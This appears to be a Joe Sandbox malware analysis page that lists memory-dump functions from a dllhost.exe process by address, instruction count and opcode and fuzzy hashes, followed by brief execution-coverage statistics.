Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: c180843bf2aaed13a048e554068f897d3935aae25654966682dbee794d8ab6d1
Instruction ID: 7020709903d7dc7e36909bd8db462bb38b1d6e2e51723b54b673343b12bad9c4
Opcode Fuzzy Hash: c180843bf2aaed13a048e554068f897d3935aae25654966682dbee794d8ab6d1
Instruction Fuzzy Hash: B7C08C30A021048BDB849FB481183DC36E1AB42300F808428800AA6380EE3809048B81

Function 049B08B8 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

E, xrefs: 049B08D0

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: f93e722fdaef51eb43522f74125c1711d7a496f394e508cd589c3a3532777c41
Instruction ID: a12af8e3b7184b5820b75382ebf94daf6c100cacef2545c511e8fba9385c6ee8
Opcode Fuzzy Hash: f93e722fdaef51eb43522f74125c1711d7a496f394e508cd589c3a3532777c41
Instruction Fuzzy Hash: A5C04C70A01105CBEB449FA48918BDD76B2BB55305F8084698146E7385EE7C19449F55

Function 049B0436 Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

), xrefs: 049B044E

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: d0267d8f50ef3353ee6a0ac08ebd5795acc7af0dc25f15afb15f9a0165c0aca2
Instruction ID: 974f6cb90a6f46a7520a711dbbe4809f63ef46ebf3cfa5b881a086da0b2457a7
Opcode Fuzzy Hash: d0267d8f50ef3353ee6a0ac08ebd5795acc7af0dc25f15afb15f9a0165c0aca2
Instruction Fuzzy Hash: 2CC04C70E01209CBEB449FB485287DD76E6AB55305F8045698006AA385EA7919044F51

Function 049B03AF Relevance: 1.3, Strings: 1, Instructions: 7COMMON

Download Yara Rule

Strings

h, xrefs: 049B03C4

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: faf57556dad39265728c38cd6215fb6087a48af46a1bf7eb290ee0b06e518adc
Instruction ID: 5f1131b5f737608220a86f6a91e62ac755e5147ad29ca1f56273ed8760e3d4cd
Opcode Fuzzy Hash: faf57556dad39265728c38cd6215fb6087a48af46a1bf7eb290ee0b06e518adc
Instruction Fuzzy Hash: D1C04C70A012098BDF449FB485187AD76A6BF55305F90463D8002A7385EF7918049B41

Function 0484F298 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2acf496c6b893141ef2a39f3b9e0ee4b4f44aaf0462d6b9068f15cd03c2547d4
Instruction ID: 927fb0c00e18ff6d83bad90b47b6753e1b419a1fbec0a20df63f738a7036f877
Opcode Fuzzy Hash: 2acf496c6b893141ef2a39f3b9e0ee4b4f44aaf0462d6b9068f15cd03c2547d4
Instruction Fuzzy Hash: F521FC74A0424ACBEB50EFA8E91826EB7F1FF80308F90856DD705D7254EB74AA44DB52

Function 00B505E0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2011640330.0000000000B50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_b50000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b158afc3269514227ed73e8b9b50d3b1869fc399ebb84e0dad5115c4ca1bd584
Instruction ID: 175ce73a34d50b094a75b616e85fc96f2125d9a991a704618fcc06edde2d15ae
Opcode Fuzzy Hash: b158afc3269514227ed73e8b9b50d3b1869fc399ebb84e0dad5115c4ca1bd584
Instruction Fuzzy Hash: C10186B65093845FD711CB16AC40863FFE8EF8A620709C5AFED498B752D125A909CB71

Function 04840007 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec08b26ad19f410de00d34ab32cd0f2b40bc259198eec10d550217b6597a78b
Instruction ID: 31dde35d20d8f7956a0ca29455ac3065a6fe089070e1b33c1b1be90cc33926c0
Opcode Fuzzy Hash: 2ec08b26ad19f410de00d34ab32cd0f2b40bc259198eec10d550217b6597a78b
Instruction Fuzzy Hash: 690140A440F3C05FD303A77828716897FB0AE53608B1E48CBC8D0CB1A3D219490AC722

Function 04846D38 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b5160322682a9b4b1998ed79edac4ae1aa1f5ce93b7591e9642f7fb7067faeb
Instruction ID: 7bd065cfb54763f93f52ca7a5d59c1e052db6a611f60358dc6c052f7fef9dd03
Opcode Fuzzy Hash: 7b5160322682a9b4b1998ed79edac4ae1aa1f5ce93b7591e9642f7fb7067faeb
Instruction Fuzzy Hash: 4FF0A734608348AFD7128B78A8093A57FA9AB87B19F000595D901C7393EF666E089772

Function 0484206F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f991e16ee8c29c3628884d654c126a81b0f575c02b8c846eb71ff6ddd2c152
Instruction ID: 4b895fa8d057e93af2772028d82a02e5654a66e4a4836ece13b2734285ade4c2
Opcode Fuzzy Hash: 27f991e16ee8c29c3628884d654c126a81b0f575c02b8c846eb71ff6ddd2c152
Instruction Fuzzy Hash: E5F08C74A08219CBDB489F28DC9436CB7A1BBC4701F0088A5E906D3350DE745E80CF41

Function 04841704 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730a5924c75b8a76baa6ce4952a718cd9ba15b7ff8477076cd9266195c8f9209
Instruction ID: bea15b549ef5bd8d7f64dd5dac8177272c1a52488e689b3a709d66c6018e8d39
Opcode Fuzzy Hash: 730a5924c75b8a76baa6ce4952a718cd9ba15b7ff8477076cd9266195c8f9209
Instruction Fuzzy Hash: C9F01DB8B05219CBDB548F38DD587ADB7B1BBC9740F0488A5E90AE2290DF749E44CF40

Function 04846A88 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81b9ceb5039ebdde7226fa184a15a3ff2632e9fffd0cf2c4c7e30985f4ede26e
Instruction ID: 7d4aa3083a1837123a8ef8d31617612900aac81884330570aa14d8b3653e5a01
Opcode Fuzzy Hash: 81b9ceb5039ebdde7226fa184a15a3ff2632e9fffd0cf2c4c7e30985f4ede26e
Instruction Fuzzy Hash: 18E092B504E3C85FD3070B2078114913F28596321430651D7E158CF273D621885AEB31

Function 00B50606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2011640330.0000000000B50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_b50000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cae48d799b0159ee6e7bbcfee1ba6693a483f2c4a2444ef135ba6bb7eceb82
Instruction ID: 19327395eb451ea35a9fc26279469663a836a5f33f611bd0f0eaa92ac708f978
Opcode Fuzzy Hash: 74cae48d799b0159ee6e7bbcfee1ba6693a483f2c4a2444ef135ba6bb7eceb82
Instruction Fuzzy Hash: 67E092B66046044BD750CF0BEC41452F7D8EB84630708C47FDC0D8B701D279B505CAB5

Function 048415D9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed7d14579c34a1979e9d2c684d5a8cf9c3ff3eae1868c08d67d541b470db8990
Instruction ID: f655d9759f83033273198b8922b94a99d38017ad7e323972ff4d89bbf2781c70
Opcode Fuzzy Hash: ed7d14579c34a1979e9d2c684d5a8cf9c3ff3eae1868c08d67d541b470db8990
Instruction Fuzzy Hash: 8D013EB4D0022DDFCB64CF18CD84BD9B7B5BB89205F0085EA964DA2211EB316E85DF59

Function 04846D48 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a77dff96704c169cf797a927884dfa6c1bf9229398eb942006f02dbe8b54893
Instruction ID: 04e2073d256a202e7167b933e4224080908d4647873e63b83466863732401765
Opcode Fuzzy Hash: 6a77dff96704c169cf797a927884dfa6c1bf9229398eb942006f02dbe8b54893
Instruction Fuzzy Hash: 58F02B30B0020CDBCB24A7B8A81D3697799FBC5B19F000568D902C3381FF7A6E488351

Function 04843A05 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 832d5b12e3144ca9a703adfb4ea4a107b28f4152980ef1c1a6164445ac5f0956
Instruction ID: e7f1e9987c1d9849c96715bc371592103f1874cd838e40a31901823124427871
Opcode Fuzzy Hash: 832d5b12e3144ca9a703adfb4ea4a107b28f4152980ef1c1a6164445ac5f0956
Instruction Fuzzy Hash: 21E08C39708168CBE7805B18851535C36E1AB8A394F088AA6FA06DB382D7399D808B96

Function 04842E1A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 802a635743e418b5f770f7390de96f6eff51a083e08694ed178d3532b57a0e87
Instruction ID: 8a375647392a8f99de4d918d5fd8b130fb71bd653a282e77b8b6cbca67b3e476
Opcode Fuzzy Hash: 802a635743e418b5f770f7390de96f6eff51a083e08694ed178d3532b57a0e87
Instruction Fuzzy Hash: C0E08675A08215DFEB105F68D81476D77A4BB84750F0448B5B849D3340D6385E40CF62

Function 006323F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1993036746.0000000000632000.00000040.00000800.00020000.00000000.sdmp, Offset: 00632000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_632000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37747aba9b12e891dac873916461f585ee377564868a8853b3522a4e8bd4fbb9
Instruction ID: 18e5a48271c0b03bfd58c10cee72ef5b8692c9db67e9e3c44cef93b4fb1abfca
Opcode Fuzzy Hash: 37747aba9b12e891dac873916461f585ee377564868a8853b3522a4e8bd4fbb9
Instruction Fuzzy Hash: 31D02E392096828FE3128A0CC1B4B8537D4AB40714F0A00F9A8008B363C328E8C0C240

Function 006323BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1993036746.0000000000632000.00000040.00000800.00020000.00000000.sdmp, Offset: 00632000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_632000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b53981a0cf6094e1a6fc760ad88a5e771a8efaaf94e4a3fc186ae1c329bad92d
Instruction ID: 08f3cb0ac542d9f3b85570eb6a7ff9008d9c6d0d0239984e3182b4021521bd5d
Opcode Fuzzy Hash: b53981a0cf6094e1a6fc760ad88a5e771a8efaaf94e4a3fc186ae1c329bad92d
Instruction Fuzzy Hash: 28D05E356452824BEB15DA0CC2E4F9973D5AF44B14F0644E8AC108B362C7A8DCC0CA40

Function 04846CD8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbe4c545c7d016e637e74c1651888008f7b1377e8890fc2cccc295049d88c99a
Instruction ID: 40f78adf7504d44c5c68037fec6f42d421df429dd49653dd6e64874ab03e5f06
Opcode Fuzzy Hash: dbe4c545c7d016e637e74c1651888008f7b1377e8890fc2cccc295049d88c99a
Instruction Fuzzy Hash: 2DC08C2800B7C46FE3032B3C6C034813F78AE1364038A10C3D0A0CB2638808290A8B7B

Function 0484110B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66203648812c9c21e5dff51a2529c8e24ecbe3d0e84ebb91d4882c5400d810d4
Instruction ID: d24233a97b69f5decaa28011b958475c9ac0ae76d4d5e8348240cb9dfa220003
Opcode Fuzzy Hash: 66203648812c9c21e5dff51a2529c8e24ecbe3d0e84ebb91d4882c5400d810d4
Instruction Fuzzy Hash: 3DD05E78A0C218D7E7104F14EC183ACB660BB81790F0049A0F909C2180DBB9AE40CF81

Function 04846998 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348c83809408587e659ffd22b9dd5bc6b3366ca6feb49b18377b39840791c25a
Instruction ID: 1e643634d1c5f336a583225175f8aef6719c0f69e24502fd3a4fafa375a94c87
Opcode Fuzzy Hash: 348c83809408587e659ffd22b9dd5bc6b3366ca6feb49b18377b39840791c25a
Instruction Fuzzy Hash: F0C01275009380CFE3016B24A0195803BA1AF0620471644E7D048CF163C2200847DB15

Function 04846C39 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f509decd09d63ddae2041ec5571db549c14c44da900ac09b61cfefc924c01bd
Instruction ID: ef84bd50ed165a61911ffe10e482234d6b09ba54b7ec4ee1421e3c75882f5e2f
Opcode Fuzzy Hash: 3f509decd09d63ddae2041ec5571db549c14c44da900ac09b61cfefc924c01bd
Instruction Fuzzy Hash: 12C04C9981F7D05EEB13563418655457F752D0301834B41CBC49C9E457D708044AC721

Function 049B0DF9 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec8cac225fa9b41720ff7dc1a40509771af2aefd04b3c9486938ff14bff3b7f
Instruction ID: 4b1ddeee55bf184fb93c1f38fc36d69ca602e4212c8a30e6fa3f39a26eb38c40
Opcode Fuzzy Hash: dec8cac225fa9b41720ff7dc1a40509771af2aefd04b3c9486938ff14bff3b7f
Instruction Fuzzy Hash: 19C0925A79E3C50EEB1302B039A60D8AF3448B311D32D20EFE089CE1E3F51A4A568712

Function 0484F250 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e01e6283f110d899050b6d91856b01fac544b4c594f05e30c01b7e840cf88ad1
Instruction ID: 0ca9454c7243953b4e8c8e84208a54a141a570e0e8c9fa4162bfbba784800161
Opcode Fuzzy Hash: e01e6283f110d899050b6d91856b01fac544b4c594f05e30c01b7e840cf88ad1
Instruction Fuzzy Hash: 9BB0123104130949C7301170A401220320C4F4150AE1000F9550C05B02D93AA0404049

Function 049B098D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8bc3dbe55258ce4aa0efe355b4dfc3a430e521c171a1a8d0f7b0080d838cdff
Instruction ID: 919c9e7322920de6d080a0a2f493596452de283da4a9bb1be809b7d1c9671997
Opcode Fuzzy Hash: d8bc3dbe55258ce4aa0efe355b4dfc3a430e521c171a1a8d0f7b0080d838cdff
Instruction Fuzzy Hash: 49C04C70E05205CBEB449FA4C11879D7AA1AB55304F9044298006AB384EA7D1444C741

Function 049B057C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 819f9be430f56ba694608647f981dce99ac8fb8528ea21ea819436cd461431be
Instruction ID: 4eeef46b1a74b2b7fa302cedf9858d589061d1f1bf71b383d0cc780f8770144b
Opcode Fuzzy Hash: 819f9be430f56ba694608647f981dce99ac8fb8528ea21ea819436cd461431be
Instruction Fuzzy Hash: 18C04C70E45209CBEB549FB491187DC7AA1AB55304F90452D8046A7385EE7C19449B91

Function 048469A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction ID: ce9f0d320568e7aeddd1da0d443e20918fc001d358bb9c195afdc7c1ad0b123c
Opcode Fuzzy Hash: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction Fuzzy Hash: 32A011300002088BC200ABA8E008EA033ECAB08A08F0000F0A20C8BA228A22B8008A82

Function 0484A2A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40443110b0f3d7501e93610cd33cdae1a96f8da79bb1405471e2153a539ed714
Instruction ID: 837a97d6ebd04d97772c30718aeb3e051da644ac4a35bccbfc08c0146fdb3c9b
Opcode Fuzzy Hash: 40443110b0f3d7501e93610cd33cdae1a96f8da79bb1405471e2153a539ed714
Instruction Fuzzy Hash: A0A02230000A0C8B828033EC380A28EBB0CACC20083800020A00C800022FAAB8008AA3

Function 04846AE0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49aa4bf79cf363648d467bc4076c134cec253beb24bba79472d06a32ecfffeaf
Instruction ID: 7a37bd59c523511826c5d1c55078843e9b1dcd39b295030e9dd2ce83600917bf
Opcode Fuzzy Hash: 49aa4bf79cf363648d467bc4076c134cec253beb24bba79472d06a32ecfffeaf
Instruction Fuzzy Hash: D4A02232082B0C83C20022B02000030B38C8A0200C3E200B8830C08F202AB3F0A0808C

Function 0484F758 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01281a83952374f01289a3157809b5f3a9a27f352e551f87e5a467ba4cb7e175
Instruction ID: 9f298da58c252dbc3072962d7ff01bcfe03185eda77c8a410282eaeed15df0b9
Opcode Fuzzy Hash: 01281a83952374f01289a3157809b5f3a9a27f352e551f87e5a467ba4cb7e175
Instruction Fuzzy Hash: 02A0021168C30C22D44022D67802B55765C4B92A69E814061E60D0AE911982745410EE

Function 0484E018 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb4795d67d103ef36568dc8300ba7ceeb5414a972b6359f5334f37c2c981f84
Instruction ID: 5ce6d8944aaf6d50185257d1a028fd4490a87da039e195b91be087485651da67
Opcode Fuzzy Hash: 5cb4795d67d103ef36568dc8300ba7ceeb5414a972b6359f5334f37c2c981f84
Instruction Fuzzy Hash: 3390027114460C8F45802799B909555B75CA5449157800061A50D415125E6565104795

Function 0484F840 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc13b7408798003484d2118497c55230ec7ad3f6f232405e8e7af18ecff9799b
Instruction ID: 2750d2a667c22864fcb631b9a9c2016866c9b6878674cfcb6a828f52c178f59a
Opcode Fuzzy Hash: fc13b7408798003484d2118497c55230ec7ad3f6f232405e8e7af18ecff9799b
Instruction Fuzzy Hash:

Function 04846C48 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0617799843237f76f26659d7671261444ce636d0cc18629660d2dbc35421b08
Instruction ID: e57354dde3fec212bf98a2b796b090a8f4e4701070449799e9b6f890f06359f7
Opcode Fuzzy Hash: e0617799843237f76f26659d7671261444ce636d0cc18629660d2dbc35421b08
Instruction Fuzzy Hash:

Function 0484F6D8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b91acfbc7404960b0d31da2bd180ddc8589c291044a02a59c2a75c33cc8a4298
Instruction ID: 59550be9a9f2389136b791784b27d15fa304775db72fca1d2949a4ddc35cad81
Opcode Fuzzy Hash: b91acfbc7404960b0d31da2bd180ddc8589c291044a02a59c2a75c33cc8a4298
Instruction Fuzzy Hash:

Function 0484EEE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4d351d00501ee3d35878ef24eedf8a1725bd57bfd5042cffa6928a5047e1728
Instruction ID: ca670f170af030b85590243eef9efe39b74c2088a5c87cbc0b9ac31a3127cb50
Opcode Fuzzy Hash: c4d351d00501ee3d35878ef24eedf8a1725bd57bfd5042cffa6928a5047e1728
Instruction Fuzzy Hash: 9690023144470DCB45542B997809995775CE944D267C10051A51D416115E66645047D9

Function 0484DE00 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204e6d6fd3b700f07ff21c7eb58ddb27b0c2fc5bd2758f132dd1f58d81f457c2
Instruction ID: 09f0c0f6ef1e8526df579236d818bc5cab53b182e3117780226e643fc9fa55a0
Opcode Fuzzy Hash: 204e6d6fd3b700f07ff21c7eb58ddb27b0c2fc5bd2758f132dd1f58d81f457c2
Instruction Fuzzy Hash: 9A90023104460D8B464127997809555B75CA5549157804051A50D415125A75E9164699

Function 0484F278 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2258942700.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26e6c2c3726cc2adc6c3b2674b99f9d30428051c27966d0fe88650f09313fe12
Instruction ID: 844a8cb229d723e303f16230607c2fede162607209d8deae6ed5998e96f22626
Opcode Fuzzy Hash: 26e6c2c3726cc2adc6c3b2674b99f9d30428051c27966d0fe88650f09313fe12
Instruction Fuzzy Hash: D190023248460ECB458427997909555775CA9445157C00055A50D515125E556410469D

Function 049B0E08 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2259583314.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_49b0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3742f0a4ea324c94f332200f5f7a3e5d5cba67164906e7bb2a2c583dad071d
Instruction ID: 561036fe7af1ca5b89911b14e33b34be8dcf07ffa9ca6489a158acbc6734831c
Opcode Fuzzy Hash: 7c3742f0a4ea324c94f332200f5f7a3e5d5cba67164906e7bb2a2c583dad071d
Instruction Fuzzy Hash:

Analysis Process: dllhost.exePID: 4940, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	66
Total number of Limit Nodes:	6

Executed Functions

